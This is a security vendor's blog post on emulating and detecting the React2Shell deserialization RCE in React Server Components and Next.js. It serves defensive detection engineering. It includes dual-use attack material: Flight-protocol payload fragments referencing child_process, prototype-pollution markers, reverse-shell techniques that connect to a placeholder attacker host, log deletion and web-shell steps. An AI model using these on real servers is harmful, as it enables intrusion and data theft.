Simulating and Detecting React2Shell: A Deep Dive into CVE-2025-55182 & CVE-2025-66478

Fred Wilmot

Introduction

When critical vulnerabilities emerge in widely-deployed frameworks, security teams face an immediate challenge: how do you detect exploitation attempts when traditional signature-based approaches fall short? The recent React2Shell vulnerabilities (CVE-2025-55182 and CVE-2025-66478) affecting React Server Components and Next.js provide a perfect case study in building behavioral detection through attack emulation.

This post walks through our process of developing a comprehensive ADEL (Attack Description Language) scenario that models the complete React2Shell attack chain, from initial reconnaissance through persistence. We’ll explore the behavioral choices we made for exploit simulation, why they matter for detection engineering, and how understanding the underlying protocol leads to more effective security controls.

Understanding the Vulnerability

React2Shell is a critical remote code execution vulnerability stemming from unsafe deserialization in the React Server Components “Flight” protocol. The vulnerability allows attackers to:

  • Craft malicious HTTP requests with specially-formed RSC payloads
  • Exploit prototype pollution through __proto__ and constructor manipulation
  • Reference dangerous Node.js modules (fs, child_process) through Flight protocol module injection
  • Achieve remote code execution on the server without authentication

While this may not reach Log4Shell levels of internet-wide exploitation, the impact of these vulnerabilities may be greater than we think, and they may be exploitable in places we don’t expect.

According to Wiz:
“Wiz data indicates that 39% of cloud environments contain instances of Next.js or React in versions vulnerable to CVE-2025-55182 and/or CVE-2025-66478. Regarding Next.js, the framework itself is present in 69% of environments. Notably, 61% of those environments have public applications running Next.js, meaning that 44% of all cloud environments have publicly exposed Next.js instances (regardless of the version running).”

The Flight Protocol: Understanding Normal vs. Malicious Behavior

Before building detection rules, we needed to understand what normal React Server Components traffic looks like. The Flight protocol is a line-delimited streaming format where each row follows this pattern:

[ID]:[TYPE]:[DATA]
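
To make the format concrete, here is a minimal Python sketch (an illustration, not the reference parser) that splits a row into its three fields; the module path in the example is hypothetical:

    import json

    def parse_flight_row(row: str) -> dict:
        # Split on the first two colons only; the DATA field may itself
        # contain colons (e.g., inside JSON strings).
        ref_id, row_type, data = row.split(":", 2)
        return {"id": ref_id, "type": row_type, "data": data}

    row = '1:I:{"id":"./src/Button.js","chunks":["main"],"name":"default"}'
    parsed = parse_flight_row(row)
    print(parsed["type"], json.loads(parsed["data"])["id"])  # I ./src/Button.js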

Normal Traffic Baseline

Legitimate RSC requests exhibit consistent patterns:

Size characteristics:

  • Typical payloads: 500 bytes to 5KB
  • Complex interactions: 5-20KB
  • Anything over 50KB warrants investigation

Structural patterns:

  • Sequential reference IDs (0, 1, 2, 3…)
  • Module references pointing to application code
  • Row types limited to expected markers (J, I, S, M, E, T)

Request patterns:

  • User agents from legitimate browsers
  • 5-30 requests per minute during normal browsing
  • Response times between 50-800ms for typical operations

Malicious Traffic Indicators

Exploitation attempts deviate from these baselines in observable ways:

Protocol violations:

  • Non-browser user agents (curl, python-requests)
  • Oversized payloads (>50KB) containing exploit code
  • Module references to Node.js core modules: :I:{"id":"fs"}, :I:{"id":"child_process"}
  • Prototype pollution markers: __proto__, constructor.prototype
  • Non-sequential or extremely high reference IDs

Behavioral anomalies:

  • Multiple failed requests followed by success (reconnaissance pattern)
  • Rapid sequential requests with slight variations (fuzzing)
  • Requests during off-hours or from unexpected geographic locations

Design Choices for Behavioral Emulation

Choice 1: Model Realistic Reconnaissance with Tool Diversity

Decision: Include failed exploitation attempts before success, and iterate through multiple user agents.

Rationale: Real attackers probe defenses using different tools. They send requests that trigger 500 and 400 errors as they refine payloads. Our scenario loops through three user agents (curl, python-requests, empty) during reconnaissance:
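
A minimal Python stand-in for that loop is sketched below (the actual scenario is expressed in ADEL; the target URL and probe payloads here are placeholders):

    import requests

    TARGET = "https://target.example/app"  # placeholder RSC endpoint
    USER_AGENTS = ["curl/8.4.0", "python-requests/2.31.0", ""]
    PROBE_PAYLOADS = ["0:J:[]", "1:I:{}", "2:Z:malformed"]  # 3 recon steps

    for user_agent in USER_AGENTS:
        for payload in PROBE_PAYLOADS:
            response = requests.post(
                TARGET,
                data=payload,
                headers={
                    "User-Agent": user_agent,
                    "RSC": "1",
                    "Content-Type": "text/x-component",
                },
            )
            # 4xx/5xx responses are expected here; the failures are
            # themselves the telemetry that reconnaissance rules key on.
            print(user_agent or "<empty>", response.status_code)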

This generates 9 reconnaissance attempts total (3 steps × 3 user agents), modeling how attackers switch tools during enumeration.

Detection Opportunity: Alert on multiple RSC requests with errors from different non-browser user agents from the same source IP. This tool-switching behavior is a strong indicator of active exploitation attempts and catches reconnaissance before the main exploit succeeds.

Choice 2: Capture Flight Protocol-Specific Exploitation with Fuzzing Simulation

Decision: Include malicious module references using exact Flight protocol serialization format, and loop through all dangerous modules.

Rationale: Generic “look for child_process” rules miss context. The Flight protocol serializes module references as:

:I:{"id":"MODULE_NAME","chunks":[],"name":"EXPORT"}

Our scenario loops through six dangerous module references:
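
A Python stand-in for that loop (this post names fs, child_process, net, and http; the scenario’s full list of six is not reproduced here, and the export name is a placeholder):

    import json
    import requests

    DANGEROUS_MODULES = ["fs", "child_process", "net", "http"]  # partial list

    for i, module_name in enumerate(DANGEROUS_MODULES):
        reference = json.dumps({"id": module_name, "chunks": [], "name": "default"})
        payload = f"{i}:I:{reference}"  # Flight module-reference row
        requests.post(
            "https://target.example/app",  # placeholder endpoint
            data=payload,
            headers={"RSC": "1", "Content-Type": "text/x-component"},
        )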

This generates six separate exploitation attempts, simulating how attackers fuzz different module imports to find what works on the target system.

Detection Opportunity: Deep packet inspection for the :I: row type marker combined with dangerous module names provides high-fidelity detection. Additionally, detecting multiple different module reference attempts from the same source within a short timeframe reveals systematic fuzzing behavior—a strong indicator of active exploitation. Volume-based rules triggering on 3+ distinct dangerous module references in under 2 minutes have extremely high confidence.
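
As a sketch, the volume rule could run as a sliding window over request logs (the field names here are assumptions about your log schema):

    import re
    from collections import defaultdict

    DANGEROUS = {"fs", "child_process", "net", "http"}
    MODULE_REF = re.compile(r':I:\{"id":"([^"]+)"')
    WINDOW_SECONDS = 120
    history = defaultdict(list)  # src_ip -> [(timestamp, module)]

    def on_rsc_request(src_ip: str, timestamp: float, body: str) -> None:
        for module in MODULE_REF.findall(body):
            if module in DANGEROUS:
                history[src_ip].append((timestamp, module))
        recent = {m for t, m in history[src_ip] if timestamp - t <= WINDOW_SECONDS}
        if len(recent) >= 3:
            print(f"ALERT: module fuzzing from {src_ip}: {sorted(recent)}")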

Choice 3: Model Multiple Prototype Pollution Vectors

Decision: Include three separate exploitation techniques: __proto__, constructor, and constructor.prototype.

Rationale: Attackers use variations to evade simple pattern matching. By including multiple vectors, we:

  • Generate diverse telemetry for rule validation
  • Test detection resilience against evasion techniques
  • Model real-world attacker behavior (try multiple approaches)

Detection Opportunity: Create layered detection rules that catch any prototype pollution attempt, regardless of specific technique used.
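
A minimal sketch of such a layered check (the patterns are illustrative and would need tuning against real payloads):

    import re

    POLLUTION_PATTERNS = [
        re.compile(r'"__proto__"\s*:'),         # direct __proto__ assignment
        re.compile(r'"constructor"\s*:'),       # constructor manipulation
        re.compile(r'constructor\.prototype'),  # constructor.prototype chain
    ]

    def looks_like_prototype_pollution(body: str) -> bool:
        # Any single vector matching is enough to flag the request.
        return any(pattern.search(body) for pattern in POLLUTION_PATTERNS)

    print(looks_like_prototype_pollution('{"__proto__":{"polluted":true}}'))  # True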

Choice 4: Randomize Payload Sizes with Realistic Variance

Decision: Use sophisticated randomization for payload sizes between 10KB and 124KB.

Rationale: Real exploitation payloads vary in size based on:

  • Exploit technique complexity
  • Payload obfuscation methods
  • Additional malicious code embedded
  • Attacker testing of size-based WAF rules

Our approach:
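
A Python stand-in for the randomization (the padding row format is an assumption; the ADEL definition itself is not reproduced here):

    import random
    import string

    def padded_payload(exploit_rows: str) -> str:
        # Pick a target size between 10KB and 124KB, then pad with random
        # text so repeated runs produce realistic size variance.
        target_size = random.randint(10 * 1024, 124 * 1024)
        pad_length = max(0, target_size - len(exploit_rows))
        padding = "".join(random.choices(string.ascii_letters, k=pad_length))
        return exploit_rows + "\n9:T:" + padding  # padding carried in a text row

    sizes = [len(padded_payload('0:I:{"id":"fs","chunks":[],"name":"default"}'))
             for _ in range(5)]
    print(sizes)  # five noticeably different sizes across runs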

This generates payloads ranging from 10KB to 124KB with random content padding, creating realistic size distributions across multiple exploitation attempts.

Detection Opportunity:

  1. Statistical anomaly detection on payload sizes: normal RSC traffic is typically under 5KB, making these oversized requests (>10KB) highly anomalous
  2. Size variation detection: multiple requests from the same source with dramatically different sizes (e.g., 15KB, then 87KB, then 112KB) indicate systematic probing of size-based defenses
  3. Baseline deviation alerting: comparing against P95/P99 baselines for your application makes even 10KB payloads suspicious if normal traffic averages 2-3KB (see the sketch below)
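
A sketch of the baseline-deviation approach (the synthetic baseline here stands in for 24-48 hours of observed normal traffic):

    import numpy as np

    # Stand-in for observed normal RSC payload sizes (bytes): mean ~2.5KB.
    baseline_sizes = np.random.normal(loc=2500, scale=500, size=10_000)
    p95, p99 = np.percentile(baseline_sizes, [95, 99])

    def is_size_anomalous(size_bytes: int) -> bool:
        return size_bytes > p99

    print(int(p95), int(p99), is_size_anomalous(10 * 1024))  # 10KB -> True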

Choice 5: Comprehensive Post-Exploitation Discovery with Random Selection

Decision: Model system and network enumeration immediately after successful exploitation, using randomized command selection.

Rationale: Attackers always enumerate the environment they’ve compromised, but rarely run every possible discovery command. We model realistic behavior by randomly selecting from common enumeration commands:

System discovery:

// Randomly selects from: whoami, id, hostname, uname -a

Network discovery:

// Randomly selects from: ifconfig, ipconfig, netstat
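
A Python stand-in for this randomized selection (the command pools mirror the lists above; the ADEL scenario itself is not reproduced here):

    import random
    import subprocess

    SYSTEM_COMMANDS = [["whoami"], ["id"], ["hostname"], ["uname", "-a"]]
    NETWORK_COMMANDS = [["ifconfig"], ["ipconfig"], ["netstat", "-an"]]

    for pool in (SYSTEM_COMMANDS, NETWORK_COMMANDS):
        command = random.choice(pool)
        # Each run spawns a different child process, so the resulting
        # telemetry varies across scenario executions.
        subprocess.run(command, capture_output=True)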

This creates variable telemetry across scenario runs, mirroring how different attackers or automated tools prioritize different enumeration commands. Seeing whoami on one run and hostname or uname -a on another builds a large enough set of behavioral variants that, combined with context about known systems and users, illustrates when these commands are unusual.

Detection Opportunity:

  1. Single command detection: Any discovery command from Node.js parent is suspicious
  2. Timing correlation: Correlate suspicious RSC requests with immediate execution of discovery commands from the Node.js process (within 10 seconds). This correlation provides strong evidence of compromise
  3. Behavioral sequence detection: System discovery followed by network discovery within 30 seconds from same process tree indicates methodical post-exploitation enumeration
  4. Command diversity tracking: Even one discovery command from Node.js warrants investigation, but seeing multiple types (system + network) confirms active attacker enumeration

Choice 6: Diverse Reverse Shell Techniques with Systematic Enumeration

Decision: Include seven different shell spawning methods and loop through all of them.

Rationale: Attackers use various techniques based on:

  • Available tools on the target system
  • Network egress restrictions
  • Defense evasion requirements
  • Trial-and-error to find what works

Our scenario systematically tests all techniques:
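
A Python stand-in for the enumeration loop follows. The techniques shown are those named elsewhere in this post (the scenario’s full list of seven may differ), the connect-back host and port are placeholders, and nothing here should be run against systems you don’t own:

    import subprocess

    HOST, PORT = "ATTACKER_HOST", "4444"  # placeholders
    TECHNIQUES = [
        ["bash", "-i"],
        ["bash", "-c", f"exec 5<>/dev/tcp/{HOST}/{PORT}"],
        ["nc", "-e", "/bin/bash", HOST, PORT],
        ["python", "-c", "import socket  # connect-back stub"],
        ["perl", "-e", "use Socket;  # connect-back stub"],
        # ...remaining techniques omitted
    ]

    for command in TECHNIQUES:
        # Failures (missing binary, blocked egress) are expected; they are
        # exactly the telemetry the detection opportunities below key on.
        result = subprocess.run(command, capture_output=True)
        print(command[0], result.returncode)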

This generates seven separate shell spawning attempts, modeling how attackers enumerate available techniques when some fail due to missing binaries or network restrictions.

Detection Opportunity:

  1. Single technique detection: Process monitoring for any child process spawned by Node.js matching these patterns
  2. Enumeration detection: Multiple shell spawning attempts with different techniques from the same Node.js process within minutes is an extremely high-confidence indicator of compromise
  3. Failure pattern detection: Sequence of failed process starts followed by a success reveals attacker enumeration and helps identify which technique succeeded
  4. Volume-based alerting: 3+ distinct shell execution attempts from a Node.js parent process within 60 seconds warrant immediate investigation (see the sketch below)
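
A sketch combining single-spawn detection with the volume threshold (the event field names are assumptions about your EDR schema):

    from collections import defaultdict

    SHELL_BINARIES = {"bash", "sh", "nc", "python", "perl", "cmd.exe"}
    spawn_history = defaultdict(list)  # parent pid -> [(timestamp, child)]

    def on_process_start(parent_name: str, parent_pid: int,
                         child_name: str, timestamp: float) -> None:
        if parent_name != "node" or child_name not in SHELL_BINARIES:
            return
        spawn_history[parent_pid].append((timestamp, child_name))
        distinct = {c for t, c in spawn_history[parent_pid]
                    if timestamp - t <= 60}
        # One spawn is already suspicious; 3+ distinct techniques within
        # 60 seconds is treated as confirmed enumeration.
        severity = "CRITICAL" if len(distinct) >= 3 else "HIGH"
        print(f"{severity}: node spawned {child_name}; "
              f"distinct in 60s: {sorted(distinct)}")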

Choice 7: Cross-Platform Coverage

Decision: Model both Linux and Windows execution paths.

Rationale: React applications run on diverse infrastructure. Our scenario covers:

  • Linux: /bin/bash, /var/log/ paths
  • Windows: cmd.exe, Windows-specific paths

Detection Opportunity: Platform-specific detection rules that adapt to the operating system while maintaining behavioral consistency.

Choice 8: Include Defense Evasion Behaviors

Decision: Add log deletion and timestomping steps.

Rationale: Sophisticated attackers attempt to cover their tracks. Modeling these behaviors ensures we detect the complete attack lifecycle, not just initial compromise.

Anti-forensics techniques modeled:

  • Log deletion: /var/log/, ~/.bash_history
  • Timestomping: touch -t to modify file timestamps

Detection Opportunity: Alert on file modification or deletion of security-relevant logs from unexpected processes (Node.js). This indicates an attacker attempting to evade detection.

Validation Methodology

Technical Accuracy Validation

We validated our scenario against:

  1. Official CVE documentation – Confirmed vulnerable package names and versions
    • react-server-dom-webpack v19.0.0
    • react-server-dom-parcel v19.0.0
    • react-server-dom-turbopack v19.0.0
  2. Flight protocol specifications – Verified serialization format correctness
    • Module reference structure matches protocol specification
    • Row type markers are accurate
    • Reference ID patterns follow protocol rules
  3. Real-world exploitation patterns – Cross-referenced with security research
    • Prototype pollution techniques match documented exploits
    • Shell spawning methods align with common post-exploitation tools
    • Discovery commands reflect actual attacker tradecraft

Behavioral Realism Validation

We measured across multiple dimensions, including attack flow variance, process relationship accuracy, and behavioral realism:

Attack Flow Variance

  • Reconnaissance → Exploitation → Discovery → Execution → Persistence
  • Each phase includes realistic sub-steps with appropriate timing
  • Failed attempts precede successful exploitation

Process Relationship Accuracy

  • Parent-child process trees are correct (node → bash/cmd)
  • All process spawning originates from compromised Node.js process
  • Cross-platform execution paths are accurate

Behavioral Realism

  • Outbound C2 connections use common ports (443)
  • HTTP methods match expected usage (POST for C2)
  • Request headers include protocol-specific markers (RSC: 1)

Advanced Detection Techniques Enabled by Scenario Design

Our emulation approach incorporates loops, randomization, and fuzzing simulation to create accurate behavior, along with the variants needed to enable detection strategies that go beyond simple signature matching.

Pattern 1: Tool-Switching Detection

Why This Works: Legitimate users maintain consistent user agents. Tool switching is a hallmark of reconnaissance and exploitation attempts.

Confidence Level: High. Very few false positives occur outside of development/testing environments.
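
A minimal sketch of the rule (per-source state is kept in memory for illustration; a real deployment would use your SIEM’s aggregation):

    from collections import defaultdict

    agents_by_source = defaultdict(set)  # src_ip -> user agents this window

    def on_rsc_request(src_ip: str, user_agent: str) -> None:
        agents_by_source[src_ip].add(user_agent or "<empty>")
        if len(agents_by_source[src_ip]) >= 3:
            print(f"ALERT: tool switching from {src_ip}: "
                  f"{sorted(agents_by_source[src_ip])}")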

Pattern 2: Module Fuzzing Detection

Why This Works: Legitimate applications reference the same modules consistently. Systematically testing different dangerous modules is fuzzing behavior that only occurs during exploitation.

Confidence Level: Very High. This pattern has near-zero false positives; normal RSC traffic never contains references to core Node.js modules.

Pattern 3: Payload Size Variance Detection

Why This Works: Normal user interactions produce consistent payload sizes (±20%). Attackers testing size-based WAF limits or including variable obfuscation create dramatic size variations.

Confidence Level: Medium-High. This may require tuning based on application behavior, but high variance (>30KB standard deviation) is strongly indicative of probing.
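
A sketch of the variance check, using the sizes from the earlier example:

    import statistics

    def high_size_variance(sizes_bytes: list) -> bool:
        # Require a few samples before judging variance.
        return len(sizes_bytes) >= 3 and statistics.pstdev(sizes_bytes) > 30 * 1024

    print(high_size_variance([15_000, 87_000, 112_000]))  # True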

Pattern 4: Shell Technique Enumeration Detection

Why This Works: Legitimate Node.js applications don’t spawn shells, and certainly don’t try multiple different shell techniques in rapid succession. This is attacker enumeration behavior.

Confidence Level: Very High. Node.js spawning any shell is suspicious; multiple techniques are definitive evidence of compromise.

Pattern 5: Volume-Based Reconnaissance Detection

Why This Works: Normal users encountering errors either retry once or navigate away. High volumes of failed requests indicate systematic probing.

Confidence Level: High. Especially when combined with non-browser user agents, high volumes of failed requests point to probing; even when benign, they reveal unexpected operational behavior worth investigating.

Detection Opportunities by Attack Phase

Our scenario generates rich telemetry at every stage, enabling multi-layered detection strategies.

Phase 1: Initial Access

High-Fidelity Indicators:

  • Non-browser user agents (curl, python-requests) to RSC endpoints
  • Multiple user agents from same source (tool switching)
  • Content-Type: text/x-component with RSC: 1 header
  • Payload size >10KB (normal traffic typically <5KB)
  • Multiple dangerous module references in short timeframe

Medium-Fidelity Indicators:

  • Multiple failed requests (4xx, 5xx) followed by success
  • Request patterns inconsistent with application usage
  • Payload size variance (stddev > 30KB)

Phase 2: Exploitation

High-Fidelity Indicators:

  • Flight protocol module references to dangerous Node.js modules
  • Prototype pollution patterns in request body
  • Combined: :I:{"id":"child_process"} in payload

Medium-Fidelity Indicators:

  • High reference ID counts in payload
  • Unusual nested object structures

Phase 3: Execution & Discovery

High-Fidelity Indicators:

  • Node.js process spawning bash or cmd.exe
  • System enumeration commands (whoami, id, hostname) from Node.js parent
  • Network discovery commands (ifconfig, netstat) from Node.js parent
  • Multiple shell execution attempts with different techniques

This timing correlation provides extremely high confidence: enumeration commands executing within seconds of an exploitation request strongly indicate compromise.

Medium-Fidelity Indicators:

  • Unusual file access patterns from Node.js process
  • Memory allocation spikes during request processing
  • Single discovery command from Node.js (requires investigation)

Phase 4: Defense Evasion

High-Fidelity Indicators:

  • Node.js process deleting log files
  • Touch command modifying timestamps (timestomping)
  • Modification of shell history files

Detection Rule Example:
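
A hedged sketch of such a rule (the field names are assumptions about your endpoint telemetry schema):

    SENSITIVE_PATHS = ("/var/log/", ".bash_history")

    def is_anti_forensics(event: dict) -> bool:
        suspicious_op = event["op"] in {"file_delete", "timestamp_change"}
        sensitive_target = any(p in event["path"] for p in SENSITIVE_PATHS)
        node_lineage = "node" in event["process_ancestry"]
        return suspicious_op and sensitive_target and node_lineage

    print(is_anti_forensics({"op": "file_delete",
                             "path": "/var/log/auth.log",
                             "process_ancestry": ["node", "bash", "rm"]}))  # True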

Phase 5: Persistence

High-Fidelity Indicators:

  • Web shell creation (shell.php, cmd.jsp) in public directories
  • File writes to web-accessible paths from Node.js process

Detection Rule Example:
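
A hedged sketch of the web shell rule (paths and extensions mirror the indicators above; the field names are assumed):

    WEB_ROOTS = ("/var/www/", "/public/", "/static/")
    SHELL_EXTENSIONS = (".php", ".jsp", ".aspx")

    def is_web_shell_drop(path: str, process_ancestry: list) -> bool:
        in_web_root = any(root in path for root in WEB_ROOTS)
        has_shell_extension = path.endswith(SHELL_EXTENSIONS)
        return in_web_root and has_shell_extension and "node" in process_ancestry

    print(is_web_shell_drop("/var/www/html/shell.php", ["node"]))  # True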

Lessons Learned for Detection Engineering

1. Protocol Understanding is Foundational

Generic pattern matching (looking for "child_process" anywhere) generates false positives. Understanding that the Flight protocol uses :I:{"id":"MODULE"} for module references enabled precise detection with minimal noise.

But beyond single indicators, fuzzing detection reveals systematic exploitation. When we detect multiple different dangerous module references (fs, child_process, net, http) from the same source within minutes, we’re not catching random noise; we’re catching systematic testing to determine which modules the target environment allows.

Key Takeaway: Invest time in understanding the wire protocol. Protocol-aware detection is dramatically more effective than generic string matching, and detecting patterns of variation in protocol usage reveals attacker enumeration behavior.

2. Behavioral Sequences and Volume Matter More Than Individual Events

A single instance of whoami execution isn’t alarming. The same command executed by a Node.js process within seconds of a suspicious RSC request is highly indicative of compromise.

But multiple shell execution attempts with different techniques (bash -c, then nc -e, then /dev/tcp/) from the same Node.js process is definitive evidence of an attacker systematically trying techniques until one succeeds.

Similarly, three different dangerous module references in two minutes aren’t three separate events; they’re one fuzzing campaign.

Key Takeaway: Build detection rules that correlate events across time, process trees, and technique diversity. The behavioral sequence and volume patterns tell the complete story of attacker methodology.

3. Model Failed Attempts and Reconnaissance, Not Just Successes

Many detection strategies focus only on successful exploitation. Our scenario’s reconnaissance phase (multiple failed requests with different user agents) reveals an earlier detection opportunity.

Tool switching behavior: seeing curl, then python-requests, then curl again from the same IP strongly indicates active reconnaissance even before exploitation succeeds.

Key Takeaway: Alert on reconnaissance patterns and failed attempts. Catching attackers during the probing phase prevents successful exploitation. Volume of failures combined with tool diversity provides high-confidence early warning.

4. Diversity and Randomization in Attack Vectors Strengthens Detection

By modeling seven different reverse shell techniques and looping through all of them, we ensure our detection isn’t brittle. If we only tested bash -i, we might miss attackers using /dev/tcp/ or python -c.

Similarly, payload size randomization (10KB to 124KB) ensures we test detection rules across the full size spectrum attackers might use, not just a single fixed payload size.

Randomization reveals detection blind spots: If your rules only trigger on exactly 51KB payloads but miss 15KB or 112KB payloads, you have a gap. Testing across the full range ensures comprehensive coverage.

Key Takeaway: Comprehensive emulation across technique variations and realistic randomization ensures robust detection coverage and reveals blind spots before attackers exploit them.

5. Defense Evasion and Volume Patterns Reveal Sophisticated Attackers

Basic exploitation might succeed without log deletion or timestomping. When we detect these anti-forensics behaviors, we know we’re dealing with a more capable adversary.

Similarly, systematic fuzzing (6 different module references, 7 shell techniques) indicates either automated tooling or experienced operators, which is a different threat profile from opportunistic scanning.

Volume and diversity metrics indicate sophistication:

  • 1-2 attempts = opportunistic/automated scanning
  • 5+ attempts with variations = systematic exploitation
  • 10+ attempts with anti-forensics = advanced persistent threat

Key Takeaway: Layer detection across the attack lifecycle and use volume/diversity metrics to assess threat sophistication. Later-stage behaviors and systematic enumeration indicate threat severity and actor capability.

Practical Implementation Guidance

For Detection Engineers

  1. Start with protocol analysis – Understand the legitimate format before identifying anomalies
  2. Establish baselines with statistical rigor – Collect normal traffic for 24-48 hours, calculate P50/P95/P99 for key metrics (payload size, request frequency, user agent diversity)
  3. Build layered detection with volume awareness – Multiple weaker signals combined provide stronger confidence than single indicators. Example: non-browser UA (weak) + oversized payload (medium) + module fuzzing pattern (strong) = very high confidence
  4. Test with comprehensive emulation – Use scenarios like ours that include randomization, loops, and fuzzing patterns to validate detection rules across the full attack spectrum before production deployment
  5. Tune thresholds using variance metrics – Use baseline statistics and standard deviation to set meaningful alerting thresholds. If normal payload stddev is 500 bytes, alert on stddev >10KB within a session
  6. Implement multi-stage detection – Early-stage alerts (reconnaissance, tool switching) with lower severity; mid-stage alerts (exploitation, enumeration) with high severity; late-stage alerts (persistence, exfiltration) with critical severity
  7. Measure detection coverage – Track which attack phase each rule targets. Aim for at least 2-3 detection opportunities per phase

For Incident Responders

When you see alerts based on these patterns:

  1. Triage based on phase and volume – Initial access alerts (reconnaissance, single exploit attempt) require investigation; systematic exploitation (multiple module fuzzing, tool switching) indicates active targeting; later phases (enumeration, shell spawning) indicate confirmed compromise
  2. Assess attack sophistication via diversity metrics – Count distinct techniques: 1-2 attempts = opportunistic; 5+ distinct attempts = systematic; 10+ with variations = advanced threat actor
  3. Correlate across indicators – Look for the complete attack chain, not isolated events. Tool switching + module fuzzing + shell enumeration = high-confidence compromise
  4. Preserve protocol-level evidence – Flight protocol payloads in HTTP logs are critical forensic artifacts. Capture full request bodies for RSC requests during incident timeframe
  5. Check for persistence comprehensively – Even if the initial exploit was blocked, web shells may have been deployed. Search for .php/.jsp/.aspx files in public directories created within incident window
  6. Assume lateral movement based on volume – If Node.js was compromised and you see 7+ shell execution attempts, assume the attacker gained code execution. Assess what data/systems the Node.js process could access
  7. Reconstruct attacker methodology – Use timing analysis and technique diversity to understand whether facing automated tooling (rapid, mechanical) or human operator (variable timing, adaptive techniques)

For Security Architects

  1. Network segmentation – Limit Node.js application server egress to only necessary destinations
  2. Process monitoring – Deploy EDR/XDR capable of tracking process genealogy from Node.js
  3. Deep packet inspection – Deploy security controls capable of inspecting RSC payloads
  4. Logging depth – Ensure HTTP request bodies are logged (with appropriate privacy controls)
  5. Patch prioritization – React Server Components vulnerabilities warrant emergency patching

Quantifying Detection Coverage

Our enhanced scenario with loops and randomization provides measurable detection coverage across the attack lifecycle. In addition, the Detecteam REFLEX™ platform provides detections deployable to your detection ecosystem (SIEM, XDR, or data lake).

Telemetry Generation Metrics

Event Volume Per Scenario Run:

  • Reconnaissance phase: 3 user agents × 3 attempts = 9 HTTP requests
  • Exploitation phase: 2 prototype pollution + 6 module fuzzing = 8 HTTP requests
  • Discovery phase: Random selection from 8 commands = 2-3 process executions
  • Shell enumeration: 7 shell technique attempts = 7 process spawns
  • Persistence & exfiltration: 2-4 file operations + network connections

Total: 28-31 observable events per scenario execution

This high event count ensures comprehensive telemetry for detection rule validation across all attack phases.

Detection Opportunity Matrix

Attack Phase    | Detection Rules                                | Confidence Level | Event Count
Reconnaissance  | 3 rules (volume, tool switch, errors)          | Medium-High      | 9 events
Exploitation    | 4 rules (module fuzz, proto pollution, size)   | High-Very High   | 8 events
Discovery       | 3 rules (process spawn, timing, commands)      | Very High        | 2-3 events
Shell Access    | 2 rules (enumeration, single spawn)            | Very High        | 7 events
Persistence     | 2 rules (web shell, file creation)             | High             | 2 events
Exfiltration    | 2 rules (data access, network)                 | High             | 2 events

Total: 16 distinct detection rules across 30+ observable events

Attack Technique Coverage

MITRE ATT&CK Techniques Modeled:

  • T1190 (Exploit Public-Facing Application) – 100% coverage with fuzzing
  • T1203 (Exploitation for Client Execution) – 100% coverage
  • T1059.004 (Unix Shell) – 100% coverage with 7 techniques
  • T1082 (System Information Discovery) – 100% coverage
  • T1016 (System Network Configuration Discovery) – 100% coverage
  • T1070 (Indicator Removal) – 100% coverage
  • T1505.003 (Web Shell) – 100% coverage

Technique Variants Per Category:

  • Exploitation techniques: 8 variants (2 proto + 6 modules)
  • Shell techniques: 7 variants (bash, nc, python, perl, etc.)
  • Discovery commands: 8 variants (system + network)
  • User agents: 3 variants (curl, python-requests, empty)

This diversity ensures detection rules are tested against realistic attack variation, not just single proof-of-concept implementations.

Conclusion

Building effective behavioral detection for modern web framework vulnerabilities requires more than CVE awareness. It demands deep understanding of the underlying protocols and behaviors, context from your environment, validated and realistic attack emulation, and tested multi-layered detection strategies.

Our React2Shell ADEL scenario demonstrates that thorough behavioral modeling creates detection opportunities at every attack phase:

  • 7 high-fidelity detection points across the attack chain
  • Multiple correlation opportunities for increased confidence
  • Cross-platform coverage ensuring comprehensive protection
  • Protocol-specific indicators minimizing false positives

The key insight is that deserialization vulnerabilities aren’t just about the exploit payload. They create observable behavioral patterns throughout the entire attack lifecycle. By modeling these behaviors comprehensively, we transform a critical RCE vulnerability into a highly detectable threat.

For security teams facing React2Shell exposure:

  1. Patch immediately (versions 19.0.1+ for React, appropriate Next.js versions)
  2. Deploy detection rules based on behavioral patterns outlined here
  3. Review logs retroactively for indicators of prior compromise
  4. Test detection efficacy using emulation scenarios
  5. Monitor for the complete attack chain, not just exploitation

As exploitation evolves in the wild, we’ll continue to update both our scenarios and the detection logic for the behaviors used in exploitation as more information becomes available.

References

  • https://www.sonatype.com/blog/react2shell-rce-vulnerabilities-require-immediate-attention
  • https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
  • https://github.com/facebook/react/security/advisories/GHSA-fv66-9v8q-g76r
  • https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp
  • https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182
  • https://react2shell.com/
  • https://github.com/ejpir/CVE-2025-55182-research